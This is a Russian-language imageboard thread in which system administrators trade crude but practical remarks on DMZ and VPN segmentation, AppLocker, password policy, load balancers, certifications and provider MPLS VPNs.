>>1160813 100 человек - это не тыпрайз ни разу, а мелкий, средний бизнес. Госы, кстати, тоже разные бывают, в крупных обычно всё интеграторы делают, а не местные админы.
>>1160897 Представь свои чувства, когда купил последний айфон официально за 120к, а он не включился и аппл пожимает плечами и обещает что-то исправить в ближайшее время...
>>1161017 >>1161074 Я вам больше скажу, принято организовывать ДМЗ через реверс прокси, каждый сервер из ДМЗ закидывать в свой сегмент сети, чтобы он не имел доступа к соседним серверам, и высшей степенью паранойи является ВПН из каждого конкретного сервера ДМЗ до локальной сети, то есть доступ из ДМЗ в локальную сеть, а из локальной в ДМЗ только через ещё одну отдельную сеть, но это топ кек, конечно же
>>1161074 >из дмз доступ же не получить к внутренней сети Я имею в виду под дмз ту зону, где находятся рабочие терминальные сервера, например. Т.е. по впн ты можешь на них зайти, но не можешь зайти в локалку по этому же впн. Точно также из локалки можно попасть на те же терминальные сервера, но не во внешнюю сеть, которая за дмз. Интернет, если он нужен, где-то сбоку на локальной машине пользователя, на терминальных серверах, его, конечно, нет. И это как бы единственно корректная архитектура с точки зрения безопасности.
Вариант же, где по впн мы попадаем внутрь всей сети и имеет доступ ко всему на свете, выше уже писал чем может закончиться - найдут пользователя с плохим паролем (в большой конторе это не сложно), найдут впн сервер (его тоже особо то и не спрячешь) и всё пикрелейтид...
>>1161075 Вариант с отдельным впном и дмз для каждого сервиса уебищен, т.к. если внутренних ресурсов много, то у разъездных сотрудников будет несколько десятков ярлычков разных впнов с... РАЗНЫМИ паролями и точками входя, иначе это всё, очевидно, теряет всякий смысл. Хуже того, если есть локалка, откуда у пользователей есть доступ ко всем сервисам сразу, то стоит кому-то схватить бекдор или поставить тимвьювер, как все титанические усилия по защите внешнего периметра идут коту под хвост.
В подобных случаях делают несколько зон с разной степенью секретности, при том доступ к ним ограничивают и из локальной сети тоже. Ну или если деньги позволяют, то покупают нормальное решение уровня того же anyconnect (впрочем, это уже давно не самое лучшее решение), где можно делать группы пользователей и вешать на них профили с разными сплит туннелями, т.е. сегментировать доступ к сети. Дальше остается только каждый сервис в свою подсеть загнать, запретить им видеть друг друга на прямую и разобраться каким группам пользаков что можно, а что нельзя.
В таком варианте у пользователя всегда работает эниконнект и в локалке, и во внешних сетях, просто используются немного разные профили, а логин и пароль всегда один и тот же. Впрочем, и выбор профилей, и ввод логина/пароля могут быть автоматизированы и пользователь даже не будет толком знать как функционирует сеть на его рабочем ноуте, при этом у него могут быть локальные админские права, что превращает ноут из корпоративной гантели таки в компьютер.
>>1161086 Дурик, впн не до сотрудника а для рутера, а с рутера маршрут куда надо дальше Например, если у тебя серверная часть разбита на две, лайк ексчейндж, то хороший вариант такой: почтовый сервер < VPN > | <VPN> сервер для подключения, OWA и тп | реверсивный прокси
Коллеги, возникла необходимость через AppLocker создать на терминальном сервере белый список приложений доступных для использования, но есть желание использовать его не так, что пользователю доступны для запуска все приложения из папки Windows и PrFiles, а только обозначенный список. Кто знает где можно посмотреть список приложений из этих папок необходимых для работы сессии юзверя (понимаю что он наверное будет достаточно большой, но на волне вскрытия покровов всяких этих новых уязвимостей начальство начало параноить)? Гуглить пытался и так и эдак, ни в какую, готовых пресетов для AppLocker'a тоже не нашел с таким уклоном.
>>1161089 Речь изначально шла о доступе произвольных сотрудников к произвольным внутренним ресурсам из внешних сетей. Пример с эксченджом нерелевантный, т.к. во-первых, не всякая его версия делится на фронт- бек-энд, во-вторых, там где такое деление заложено архитектурно и проблем никаких не возникает, в третьих, почтовый сервер всё равно всегда доступен из вне, т.е. сотрудникам не нужно ничего дополнительно предпринимать, чтобы им пользоваться откуда угодно.
>>1161094 Через ГПО рассматривал как вариант, но нигде не нашел принцип работы, если у апплокера четко написано что проверяет по хэшу, то ГПО не описано по хэшу или это просто хуета, у которой можно будет в изи подменить сам исполняемый файл.
>>1161092 >шла о доступе произвольных сотрудников к произвольным внутренним ресурсам из внешних сетей Ну, я думал, что мы уже согласились на ВПН, так как остальные варианты не являются безопасными Ексчейндж - разговор про правильный ДМЗ, а не просто создал отдельную подсеть и туда напихал
>>1161095 >подменить сам исполняемый файл. Да, так и есть, но ты можешь использовать оба решения разом: 1. Аплокер не даст доступ никуда кроме програмфайлс, а туда может писать файлы только администратор 2. А ГПО залочить файлы по именам, опять же переименовать файл в програмфайлс, насколько я помню, простой юзер не может или как-то так
>>1161103 У многих доступ тупо по доменному логину и паролю. Сертификаты нихуя не работают, если компания не может осилить выдачу корпоративных ноутов всем сотрудникам, работающим удаленном, но не способным самостоятельно поставить сертификат на свой домашний комп, а такие - все пользователи, лол.
>>1161109 Я сейчас говорю не об виндовых решениях, а например о openvpn.
Как делаю я - у меня опенвпн, на котором сделана подсеть для клиентов своя, и стоит запрет ходить куда-то ещё. Когда человеку нужен доступ до внутреннего ресурса, я добавляю правило в фаерволе на именно этот ресурс именно на этого человека, и добавляю ему маршрут в локалку. Сертификаты выпускаю на отдельной машине, когда нужно оформить доступ удалённому пользователю - засовываю сертификат в 7з архив с шифрованием АЕС и километровым паролем, посылаю почтой архив, по телефону отдельно голосом говорю пароль. Какие в таком подходе проблемы?
>>1161114 >Какие в таком подходе проблемы? Ну представь, у меня в компании 3000+ пользователей, из них у трети есть внп доступ. Еще у нас десятки внутренних серверов на которые пользователи хотят ходить. Часть этих внутренних ресурсов - фермы с брокером, т.к. ты обращаешься всегда к брокеру, а он пробрасывает тебя на члена фермы, члены фермы каждый имеет свой адрес и могут появляться и исчезать с течением времени. 99% пользователей не способно не то, что сертификат установить или опенвпн клиент себе поставить, а даже архив распаковать не смогут (особенно 7z - это не самый популярный формат среди офисных хомячков).
Теперь прикинь, СКОЛЬКО, у тебя будет работы при твоем то подходе...
>>1161115 А, ну да, масштабы. У меня не больше сотни клиентов по впн, а сотрудников около тысячи. Единственное что я не автоматизировал в этом алгоритме - передача архива с паролем, остальное скриптами делаю.
Так-то да, согласен, при больших масштабах работы много. Но в остальном по моему ок.
>>1161103 >>1161109 Про сертификат анон прав, даже в моём 6к сотрудников продакшене ВПН на циске по паролю от АД
Есть вариант - сложные пароли, и ещё один, который у себя пока не внедрял, но друг делал: https://habrahabr.ru/post/310604/ На основании подобного костыля он пинал юзеров на смену "сложных" паролей соответствующих политике на действительно сложные пароли
>>1161117 > при больших масштабах работы много Так лучший показатель качества - масштабируемость
>>1161097 >1. Аплокер не даст доступ никуда кроме програмфайлс, а туда может писать файлы только администратор
Схуев? Можешь настраивать правила для путей как хочешь, всё зависит от тебя.
>>1161097 >2. А ГПО залочить файлы по именам, опять же переименовать файл в програмфайлс, насколько я помню, простой юзер не может >или как-то так
>>1161091 >Коллеги, возникла необходимость через AppLocker создать на терминальном сервере белый список приложений доступных для использования, но есть желание использовать его не так, что пользователю доступны для запуска все приложения из папки Windows и PrFiles, а только обозначенный список. >Кто знает где можно посмотреть список приложений из этих папок необходимых для работы сессии юзверя (понимаю что он наверное будет достаточно большой, но на волне вскрытия покровов всяких этих новых уязвимостей начальство начало параноить)? Гуглить пытался и так и эдак, ни в какую, готовых пресетов для AppLocker'a тоже не нашел с таким уклоном.
Через ГПО распространяешь политику Апплокера. В самом апплокере настраиваешь как душе угодно. Хоть по хэшу, хоть по сертификатам, хоть по путям.
>>1161118 >ВПН на циске по паролю от АД Единственный вариант перейти к сертификатам - выдавать сотрудникам преднастроенные ноуты. Приличные компании, беспокоящиеся о безопасности так и делают. Тем более, что выдавать ноуты выгоднее, чем оборудовать рабочие места компами. Но тут зрелость бизнеса нужна, т.к. многие боятся, что ноуты разворуют, что на них будут не работать, а развлекаться, что их сломают, постоянно таская домой, что не будут появляться в офисе, оправдываясь "из дома поработаю", что так дороже выйдет. И развеять все эти заблуждения невозможно - бизнес сам должен понять, что стационарные компьютеры давно устарели и по сути своей уже давно никому не нужны, кроме геймеров да дизайнеров.
>сложные пароли Этот вариант вообще не работает. Особенно сильно он не работает в сочетании с необходимости регулярной смены пароля. Умные люди, кстати, давно уже пришли к выводу, что сложный пароль помнить нужно всего один, а менять его только при подозрении, что он был скомпрометирован, отслеживанием чего и должна заниматься служба безопасности. Подробнее тут: https://habrahabr.ru/company/everydaytools/blog/334600/
>>1161137 >PCI DSS или ISO 27000 Ну тогда смирись, что у всех пользователей всегда будут пароли вида: pA$Cf0Rd1_ pA$Cf0Rd_2 pA$Cf0Rd3_ pA$Cf0Rd4_ pA$Cf0Rd_5 Которые, кстати, хорошо брутаются, подробнее тут: https://habrahabr.ru/company/everydaytools/blog/323864/
>>1161134 >Единственный вариант перейти к сертификатам - выдавать сотрудникам преднастроенные ноуты. Приличные компании, беспокоящиеся о безопасности так и делают. Тем более, что выдавать ноуты выгоднее, чем оборудовать рабочие места компами. Но тут зрелость бизнеса нужна, т.к. многие боятся, что ноуты разворуют, что на них будут не работать, а развлекаться, что их сломают, постоянно таская домой, что не будут появляться в офисе, оправдываясь "из дома поработаю", что так дороже выйдет. И развеять все эти заблуждения невозможно - бизнес сам должен понять, что стационарные компьютеры давно устарели и по сути своей уже давно никому не нужны, кроме геймеров да дизайнеров.
Если фирма большая, то можно заморочиться и поднять портал на котором пользователи будут сами себе генерировать сертификаты.
>>1161142 > то можно заморочиться и поднять портал на котором пользователи будут сами себе генерировать сертификаты Это так не работает 1 - это не секурно 2 - юзеры это не будут делать, это не их проблема и задача 3 - головная боль для эникеев
>>1161145 После пары смены паролей - всё вернется на круги своя. Ну или тебе нужно постоянно брутить радужными пароли собственных пользователей и после постоянно пиздить пользаков за нарушения. Упрешься ты в то, что какой-нибудь топ-менеджер в итоге пошлет пошлет тебя нахуй... ну или бабки из бухгалтерии устроят бунт, в котором топы обвинят, конечно, тебя. Всех, кто пытается плыть против течения - смоет. Рано или поздно.
>>1161149 >им деваться некуда Ага, до первой проблемы у какой-нибудь важной шишки, после чего все подобные штуки навсегда закрываются, либо часть избранных сотрудников, начинает работать в обход них. Не нужно усложнять. Максимум что можно сделать - двухфакторную авторизацию по смс для сотрудников, входящих в сеть удаленно. И то это херовая идея, если, например, я уехал в Тай на месяц и оставил российскую симку дома за ненадобностью, а потом оказалось, что без меня бизнес нихуя не может, т.к. мой коллега заболел/умер.
>>1161151 >Ага, до первой проблемы у какой-нибудь важной шишки, после чего все подобные штуки навсегда закрываются, либо часть избранных сотрудников, начинает работать в обход них. Не нужно усложнять. Максимум что можно сделать - двухфакторную авторизацию по смс для сотрудников, входящих в сеть удаленно. И то это херовая идея, если, например, я уехал в Тай на месяц и оставил российскую симку дома за ненадобностью, а потом оказалось, что без меня бизнес нихуя не может, т.к. мой коллега заболел/умер.
Я же написал, энтерпрайз. У нас всё как часы и с большими шишками тоже.
>>1161151 >После пары смены паролей Ты вообще не читаешь, что тебе пишут, подобный костыль был внедрён после проведения аудита PCI DSS, когда у пользователя оказался пароль Andrey1, он отвечал всем требованием сложных паролей, но стандартизацию мой друг не мог пройти до устранения подобных паролей, от чего и был придуман костыль по удалению самых популярных паролей Иди фантазируй дальше. Даже в моей конторе с 6к пользователями без стандартизации есть сложные пароли с сроком 42 дня, все сидят с такими паролями и не пукают
>>1161156 Ты реально на 100% уверен, что у вас не осталось херовых паролей? То, что ты прошел аудит и получил сертификат вчера, вовсе не значит, что пройдешь его сегодня! Потому что у вас пароли сложные и регулярно меняются, а изменить поведение и привычки людей невозможно...
>>1161153 Не верю. Скорее всего, ты просто не знаешь о той хуйне что где-нибудь сбоку от тебя творится. А хуйня, она, точно есть.
>>1161184 Расслабься уже, аудит проводится раз в какое-то время, если нужно подтверждения стандартам ИБ, и не у меня, а у друга Ну не хочешь ты сложных паролей, так не делай, кто тебе запрещает
>>1161115 >особенно 7z - это не самый популярный формат среди офисных хомячков Для меня загадка как эти люди получают работу и что они пишут в резюме. Резюме бухгалтера еще могу себе представить, но что пишут какие-нибудь эффективные менеджеры по работе с клиентами или продаваны? "Сидел и продавал"? "Эффективно общался с клиентами"? "Ворд, Эксель, 1С, интернет"?
Коллеги, слушайте, столкнулся с проблемой балансировки нагрузки. Тестирование показало, что балансировщик подставляет свой ip-адрес в запрос к серверу и обратно, вместо реального адреса клиента. При этом пропадает возможность определения клиента от которого исходит запрос. Возможно как-то обеспечить обратную маршрутизацию, т.к когда адрес клиента будет пробрасываться сквозь балансировщик?
>>1161197 >эффективные менеджеры по работе с клиентами или продаваны Что-то типа: - Увеличение продаж на вверенном регионе на 25 процентов за квартал. - Работа с возражениями потенциальных клиентов, увеличение базы данных клиентов на 10 процентов за месяц. - Призер по продажам конкурса "Лучший продавец ООО Рога копыта"
>>1161223 У nginx можно вместе с адресом балансировщика записывать реальный ip. Можно напердолить сканирование логов nginx и дальше использовать адрес клиента где надо.
Вроде Nginx Application Platform позволяет сразу питоновский код выполнять, я правда вообще рпо это ничего не знаю. Но в теории наверное можно решить эту проблему чисто средствами nginx
<anclbob> как заблокировать диапазон 192.168.0.0-192.168.254.254 на freeBSD? <anclbob> я сделал файл в 65 тыс строк вот таких: ifconfig_fxp0_alias0="inet 192.168.0.0 netmask 255.255.255.255" ..... ifconfig_fxp0_alias65434="inet 192.168.254.254 netmask 255.255.255.255" <anclbob> занёс в rc.conf, но фря загружалась минут 20 и дошла только до 192 подсети. <anclbob> Как решить такую проблему что бы нежелательные пользователи не могли попасть в сеть никак?
>>1161219 >в разрешенном списке у регулятора С-терра - да, конечно, это российская компания, выпускает модули ВПН для цисок, "с целью скрыться от сертификатов злых пендосов в ипсек", а на деле, просто, чтобы смотреть банковский трафик
>>1161233 >С-терра - да, конечно, это российская компания, выпускает модули ВПН для цисок, "с целью скрыться от сертификатов злых пендосов в ипсек", а на деле, просто, чтобы смотреть банковский трафик
Понятно, спасибо, не знал. У нас другое зло - Амикон.
>>1161229 >У nginx можно вместе с адресом балансировщика записывать реальный ip. Можно напердолить сканирование логов nginx и дальше использовать адрес клиента где надо. > >Вроде Nginx Application Platform позволяет сразу питоновский код выполнять, я правда вообще рпо это ничего не знаю. Но в теории наверное можно решить эту проблему чисто средствами nginx
Поднимать nginx под такое не будут, у нас купленный SCCM, который такое не умеет вроде как. Ну либо надо будет непосредственно в пакеты вносить изменения.
Аппаратные решения тоже подойдут, если есть NLB с такими фичами.
>>1161223 Тоже самое, у нас стоит х-прокси реверсом на почту, на х-прокси видны внешние ИП, а дальше на почту приходят запросы с самого ревирса, но нас это устраивает У тебя какая цель?
Сап сасач. Итт сыч 25 лвл. Хочу работу, связанную с ойти. Много раз пытался в погромирование с 16 до 23 лет, но СДВГ не считает, что мне это нужно, забил уже. Вообще я уже года два чекаю вакансии курьера на хедхантере, но по моему округу, в <часе пути, нормальных вакансий вообще нихуя нет, и это сраный ДС. Только на развоз еды, но это супер дно, не хотет.
В общем к сути. Я знаю что тут сейчас все дохуя самоучки мне напишут что я долбоеб, но может найдется кто адекватный с нормальным ответом. Насколько котируются курсы сис.админов? Мне нужно чтобы меня всему научили за n часов, выдали бумажку и можно было сразу искать работу, надоело сычевать и жрать мамкины коклеты и пельмени. Может посоветуете контору нормальную, или просто пару советов дадите, заранее благодарю. Открыл, перед тем как это написать, первый результат в гугле, там типа за 60 академичиских часов за полтора месяца дают основу с практикой, за 12к рупий. Пока что планирую подыскать подобное, но поближе к дому, а не в полутора часах езды в один конец.
>>1161247 >Тоже самое, у нас стоит х-прокси реверсом на почту, на х-прокси видны внешние ИП, а дальше на почту приходят запросы с самого ревирса, но нас это устраивает >У тебя какая цель?
Это балансировщик LDAP. Учетная запись сотрудника лочится, но источником выступает балансировщик, из-за чего найти реальный источник невозможно. Тоже самое в DNS. Системы устраивают ДДОС, но конкретных клиентом не видно.
>>1161251 >Мне нужно чтобы меня всему научили за n часов, выдали бумажку и можно было сразу искать работу, надоело сычевать и жрать мамкины коклеты и пельмени. Может посоветуете контору нормальную, или просто пару советов дадите, заранее благодарю.
>>1161251 Такие "курсы" - развод и лохотрон. Выбери интересующие тебя продукты/железки, найди на торрентах программу обучения составленную вендором и готовься по ней - вся информация есть интернете в почти открытом виде. Потом, если средства позволяют, можешь сдать официальный вендорский экзамен. Получишь ачивку - сертификат. Его можно будет вписать в резюме и работодатель увидит, что ты не полный долбоеб и из лужи не пьешь. Можно будет вкатиться на нормальную работу и начать набивать экспу.
>>1161315 > Чего умеешь то, чего хочешь? Ну, некоторые базовые знания есть. Пару лет назад ещё бубунты всякие с минтом ставил на свой ноут. Арч правда так и не смог поставить, мб из-за железа ебанутого.
> Сколько денег есть на обучения/сертификации Тот первый результат в гугле стоил около 12к за все 60 академ.часов. Хотелось бы не больше тридцатки тащемта.
К вопросу о стойких паролях. Неплохой вариант же випнетовский генератор бреда. Он, правда, как-то пропал из публичного доступа, но подобную "глокую куздру" и самому накарябать можно. А ещё к аналогичному вопросу в прошлых тредах кто-то писал, что пароли генерирует начальник - бывший вояка. Он, значить, ходить и матькается, а анон за ним записывает. Главное, чтоб запоминалось. Наркоманские фразочки випнета и витиеватый отборный мат - таки запоминаются. Для совсем дебилов либо биометрия, либо увольнение слишком инициативного анона.
>>1161331 Надеюсь, в ближайшие годы уже полностью перейдут на фейсайди и дактилоскопию. Встроить камеру в монитор, или сканер отпечатков пальцев в мышь/клавиатуру - такое уже есть. Вопрос за софтом и за внедрением решений в бизнес-секторе.
>>1161328 Вангую, ты не смог поставить загрузчик в арче, т.к. не разобрался, что для EFI нужен GTP диск, а для BIOS - MBR. Ну и аргументы у команды установки загрузчика, соответственно, будут немного отличаться.
>базовые знания есть Если ты хочешь по части линуксов развиваться, то без опыта и образования логично задуматься о RHCSA EX-200 и RHCE EX-300 - в зависимости от твоего опыта. По цене сертификат обойдется в 16-18к рублей где-то. На многие начальные позиции после этого тебя будут охотно брать и с учетом уровня ЗП, твои вложения окупятся в первые же недели на работе.
>>1161706 >ограничение на пароли в той же АД по длине Там от каждого слова берутся первые три (или сколько получится) буквы. >>1161705 >"расистский моллюск гарцует нагениталиях" И конец этих слов АЛЬМСИВИ
>>1161777 По идее эта херня отвечает за совместимость аппаратной и программной части, cisco.com вообще никакой инфы не дает на этот счет. Собираюсь загнать 6500 в VSS, в инструкциях предлагают обновить ROMMON на SUP плате, но тоже без объяснения, блеать.
>>1161802 >Как они его блокируют? Я могу тебе немного подсказать, но я боюсь, что меня посодят ссылка только в ознакомительных целях, по твоему вопросу гугли "обход DPI" pympekep .com/foru m/viewto pic.ph p?t=5126 394 И обход блокировок незаконен, ты должен сидеть на бутылке, как и я
>>1161805 >1841 У меня была такая, я её другу подарил, наверное надо было себе оставить >>1161802 >>1161805 А да, и почисть кешДНС и открой в вкладке инкогнито
У меня тут дилемма. Ставить домен, или ну его в задницу?
Есть локалка на 20 юзеров без домена. Нужно воздвигнуть 1С SQL сервер. При попытке поставить MS SQL, он требует от меня данные для входа polybase engine. И не принимает ни локальные учётки, ни системные. Говорит, давай домен. Вот я и думаю, может плюнуть, засучить рукава, и таки сделать домен? Поднять ещё одну виртуалку, поставить домен, ввести сервер 1С в домен и после завершения работ с 1С потихоньку переводить в домен все остальные серверы и юзеров. Но это лишняя работа, плюс у многих тут винда версии хоум. Получится много геморроя и сеть надолго станет одной ногой в рабочей группе, а другой в домене.
>>1162205 >локалка на 20 юзеров ну хууууууй знает, хотя домен, конечно, добро, но на 20 юзеров, ну крепко хуй знает С другой стороны ты хочешь использовать PolyBase, который должен откуда-то брать данные, не?
>>1162205 > Параллельное хранилище данных PolyBase — это технология, которая обращается к данным за пределами базы данных с помощью языка t-sql. В SQL Server 2016 она позволяет выполнять запросы к внешним данным в хранилище BLOB-объектов Azure или Hadoop, а также импортировать данные в такое хранилище и экспортировать их из него. Ответ очевиден - тебе не нужен PolyBase Engine, не ставь его.
>>1162211 >С другой стороны ты хочешь использовать PolyBase Так уплочено же! Лицензионный Microsoft SQL Server 2016 Standard честно куплен. Правда, Runtime, а не Full, но всё равно. >>1162220 Эх. Это как заплатить проститутке за секс с любыми извращениями, а потом взять и обойтись ез копро. То есть, вроде и не хотелось, но жаба душит.
>>1162229 Если не будешь юзать, то не надо ставить, нахуй ты себя мучаешь, 20 человек без домена себя отлично чувствуют Хотя, просто можешь сделать - потренироваться
>>1162651 Шли борзых погонщиков нахуй. Работодатель имеет с тебя в несколько раз больше бабок, чем платит тебе. Главное, не развивай у себя чувство вины.
>>1149761 (OP) Вы же понимаете что вашу работу может выполнять не сильно развитая нейросетка? И что в топовых компаниях админов уже выкинули на мороз, и вся работа по расширению и поддержке работоспособности выполняется именно так?
В будущие пять лет ваша профессия полностью вымрет, останутся только такие полуразрабы-внедренцы нейросетей.
>>1162986 До полноценного ИИ ещё очень долго, и он заменит натурально всех. А вот нейросети уже сейчас админов заменяют.
Я бы на вашем месте перекатывался уже сейчас, пока компании крупные не просекли тренд. В теории, из админа может получиться что-то вроде программиста, при должных усилиях.
>>1162987 >нейросети уже сейчас админов заменяют Это интересно как? Конечно некоторая автоматизация присутствует, всякие ансиблы и докеры позволяют в одиночку управлять сотнями, если не тысячами машин. Вот только конфиги и сценарии таки не нейросети пишут
Привет котаны. Есть два стула - ccna и далее / mcsa и далее. Сам пока хуй простой но знания некоторые по обоим областям есть. Чего хочу получить - хочу перекатиться в ДЦ через полгода-год (а тут надо от 60к зп иметь) и с перспективой съёба в гейропу или асашай. На какой стул садиться?
>>1162885 > Хоть куда-нибудь точно возьмут. Это "хоть куда-нибудь" скорее всего означает какую-нибудь говноконтору на другом конце города. Тратить по полтора часа на путь до работы и потом обратно столько же, и всё это за 25к...
>>1162987 >В теории, из админа может получиться что-то вроде программиста Ты с ума сошел что ли? КАК из админа может получится программист? Говнокодер разве что какой-нибудь выйдет на скриптовых языках. Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут.
>>1163036 >Есть два стула - ccna и далее / mcsa и далее. тут только ты сам можешь для себя определить что тебе ближе. Забаботать зласчастныю сотку в месяц в ДС можно как сетевиком, так и виндоадмином. Насчет асашай это ты перегнул, как я уже выше ответил. Админ это не та работа, кого там встретят с распростертыми объятиями. Зачем брать тебя, если полно индусов с гражданством и языком? Накой ты - русский Ваня - там нужен? Домен админить что ли? Сами справятся.
Насчет замены админов нейросетями соглашусь. Большинство работы рядового админа на данный момент — это рутина с неким техническим уклоном. (Создание учеток в AD, прописывание вланом на интерфейсах, пердолинг iptables и тому подобная херня.) Уже сейчас, полагаю, можео все это автоматизировать. И 80 процентов работы админа вообзще отпадет. Останется те 20% которые отведены на внедрение различных решений. А этим уже займутся интеграторы. А ты, админ, бери в руки метлу и начинай привыкать к конкурентной берьбе с нашими братьями из Средней Азии.
>>1163160 >Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут. Как бывший программист, ушедший в админство, могу сказать, что это всё заблуждения. 90% программистов - говнокодеры, которые 20% времени занимаются написанием небольших фич и 80% времени поиском багов в чужом коде. Короче, никакой светлой головы не нужно, если ты не краснодипломник ВМК МГУ, работающий звездой в области машинного обучения или биг дата... Но таких реально единицы и ты либо уже такой, либо таким тебе никогда не стать. Понимание этого к кому-то приходит через несколько лет, кому-то через десяток другой, а в итоге либо смиряешься, либо меняешь область деятельности на ту, в который ты можешь стать хоть чуть-чуть чем-то большим, чем просто мелкой шестеренкой на 100 строк кода в проекте, где этого кода миллионы строк...
>>1163036 Поинтересуйся каких вакансий в гейропке больше, вот тебе и ответ. По Москве могу сказать, что вакансий сетевиков гораздо меньше, чем виндовз-админов, однако устроиться сетевиком проще. Во-первых, потому что среди вин-админов адская конкуренция, во-вторых, потому что под вин-админов попадают и многочисленные шива-вакансии. Вот только ccna, конечно, ни о чем, - это уровень техподдержки, для 60-100к тебе нужен уровень не ниже ccnp, можно без сертификатов.
>>1163165 Ты ведь тот траль? Я тебе уже писал, что ты нихуя не разбираешься в IT, напишу еще раз:
>создание учеток в AD Есть такая штука, как identity management системы - учетки новым сотрудникам сразу во всех нужных информационных системах создаются прямо в отделе кадров, при оформлении на работу...
>прописывание вланом на интерфейсах В ЦОДах обычно интерфейсы в транках, а транк на вланы разбирает уже сам гипервизор. На доступе используют 802.1x - комп авторизуется по сертификату и радиус сервер на основе этой авторизации назначает порт в нужный влан. Технологии много лет уже, кстати, т.е. она и задолго до всяких SDN была.
>пердолинг iptables Приличные NGFW фаерволы, вроде PaloAlto или Checkpoint давно уже (несколько лет как) динамически создают и применяют правила для сетевых сессий разных пользователей, т.е. узнают что трафик принадлежит Васе и применяют политику для всех групп, в которые Вася входит...
Да, такие штуки внедряют интеграторы, но вот эксплуатацией занимаются местные специалисты, т.к. если что-то, вдруг, упало, то реакция нужна немедленная, а никакой контракт с интегратором ее гарантировать не может. Если он вообще есть... потому что местных спецов держать дешевле.
>>1163174 >Ты ведь тот траль? Я тебе уже писал, что ты нихуя не разбираешься в IT, напишу еще раз Ты только что подтвердил то, что я написал выше. Всё до простоты автоматизировано. И не требует глубокихъ знангий и вшемательства админа. И внедряется интеграторами. И динамически всё назначается и т.д. и.т.п. Так получается, что админы УЖЕ нахрен не нужны. Взял макаку, которая по мануалам будет эксплуатировать весь парк и хватит. Если что - поможет интегратор.
>>1163176 Не, это ты снова подтверждаешь, что не имеешь никаких представлений о том как всё это на самом деле устроено, раз считаешь, что для обслуживания подобных информационных систем не нужны квалифицированные специалисты...
>>1163200 И снова ты не прав. Один админ в принципе быть не может, ведь он может уволиться/умереть/шантижировать с огромными потерями для бизнеса. Нужно минимум двое, но если один умер/уволился, то мы оказались в предыдущей ситуации... Т.е. нужно минимум 2-3 человека. При том 2-3 сетевика, 2-3 виндовс-админа, 2-3 человека, отвечающих за работу инфраструктуры (сети и системы хранения данных, блейд-сервера, виртуализация), дальше нужно 2-3 человека по каждой крупной информационной системе, базе данных... Не слабый такой штат уже выходит. И это уровень среднего бизнеса, в крупняке столько человек может в каждом региональном филиале сидеть!
Ну а в мелком бизнесе, где нет всех этих автоматизаций, как раз-таки и нужно много человек, чтобы делать рутинные операции, при том хоть кто-то из этих людей должен быть способен что-то внедрить - как-то ведь там та же адешечка появляется... и ведь не руками сисинтеграторов, услуги которых мелкому бизнесу явно не по карману.
Сетевики, два вопроса к вам: 1. На уровне ядра сети кроме RSTP и port-channel ещё что-то используется? или не 2. Как выглядит VPN от провайдера? Как выглядит он для сетевика, просто нешифрованный маршрут в сети провайдера, или нечто большее? Как он настраивается для сетевика, достаточно добавить ip route или надо ещё добавлять ipsec на интерфейс и всё шифровать? В чём плюсы в сравнении с обычным VPN
>>1163207 1. На ядре терминируются вланы, работает dhcp, может быть даже фильтрация. Ну и маршрутизация может быть, например, площадка в stub зоне, и эта зона на ядре крутится вместе с бэкбондом до роутера. Вообще понятие "ядра" весьма широкое - пара нексусов в ЦОДе тоже ядро, но там, куча совершенно других технологий и протоколов может применяться, например вместо port-channel будут VPC домены...
2. VPN от провайдера бывает L2 и L3. В обоих случаях твои езернет фреймы или ip пакеты гонятся через транспортную MPLS сеть провайдера, внутри его сети твой трафик изолирован от трафика других пользователей и интеренета. Отличие от VPN поверх интернета очевидно - в интернете твой трафик будет доступен всем узлам, через которые пройдет, плюс ты никогда не можешь предсказать что это будут за узлы. Т.е. в случае VPN от провайдера, не обязательно что-то шифровать, если доверяешь провайдеру, т.к. твой трафик будет доступен только ему одному.
Для сетевика настраивается всё очень просто - втыкаешь линки на двух площадках. Если это L2, то вешаешь серые адреса из одной подсетки и всё работает, как будто у тебя один большой сегмент сети. Если это L3, то у тебя будут Ip-адреса на интерфейсах до провайдера, т.е. чтобы связать две площадки придется сделать маршрутизацию, при этом, очевидно, ты уже не можешь использовать одинаковые подсетки с двух сторон. В случае vpn через инет, у тебя будет какой-нибудь gre тунель, т.е. тоже нужна будет маршрутизация.
Всякие ipsec во всех случаях вешаются поверх внешних интерфейсов и настраиваются политики, чтобы ipsec применялся только к нужному тебе трафику на этих интерфейсах. В случае vpn через инет можно применять ipsec только к трафику внутри GRE-туннеля, т.к. повесить ipsec на GRE-интерфейс.
>т.к. твой трафик будет доступен только ему одному. А если провайдеров несколько, например в начале пути - это МГТС, а в втором офисе Билайн не говорим про всякие там провайдеры сотой мили
>Всякие ipsec во всех случаях вешаются поверх внешних интерфейсов и настраиваются политики, чтобы ipsec применялся только к нужному тебе трафику на этих интерфейсах Это ясно дело
То есть провайдер может изолировать твой маркированный всякими VPLS/MPLS флагами трафик от остальной сети? Но при этом может тебя на хую покрутить, если ты его не зашифруешь?
>>1163214 >если провайдеров несколько Тогда, скорее всего, они просто предоставляют тебе интернет, а не L3/L2 VPN. Да, бывает, что последнюю милю провайдер арендует у другого прова, но оборудование он всё равно ставит свое, конечно.
>провайдер может изолировать твой маркированный всякими VPLS/MPLS флагами трафик от остальной сети? Провайдер заводит каждого клиента в свой VRF, внутри которого и MPLSит твои пакеты по своей сети, т.е. да они никогда не пересекутся с чужим трафиком, а если такое, вдруг, случится, скорее всего, у тебя где-то что-то упадет и ты напишешь провайдеру заявку, чтобы он это дело починил.
>Но при этом может тебя на хую покрутить, если ты его не зашифруешь? Ты имеешь в виду проснифать твой трафик и украсть какую-нибудь внутреннюю инфу? Теоретически может. Практически ни один пров этим занимать не будет - если поймают, то прикроют сразу весь бизнес этого провайдера. Может ли он это по решению суда или запросу из ФСБ? Может и даже обязан будет... Может ли какой-нибудь один админ прова поиметь крупного клиента? Крайне маловероятно. Помимо доступов и навыков, нужно сделать так, чтобы никто ничего не заметил, плюс риски при поимке очевидно какие - в лучшем случае тюремный срок, в худшем, тебе устроят несчастный случай те, кого ты поломал (даже крупный бизнес у нас до сих пор по бандитским понятиям живет к сожалению). Не представляю, чтобы кто-нибудь на такое решился... Ну и служба безопасности проверяет людей, перед наймом, т.е. если у тебя родственники сидели или ты засветил свои сомнительные связи в прошлом (общался с теми, кто судим за IT-преступления, например), то тебя просто не возьмут на работу, чтобы не рисковать лишний раз. Олсо такие случаи мне известны - коллегу не взяли в крутое место, т.к. у его бати много лет назад была судимость за экономическое преступление 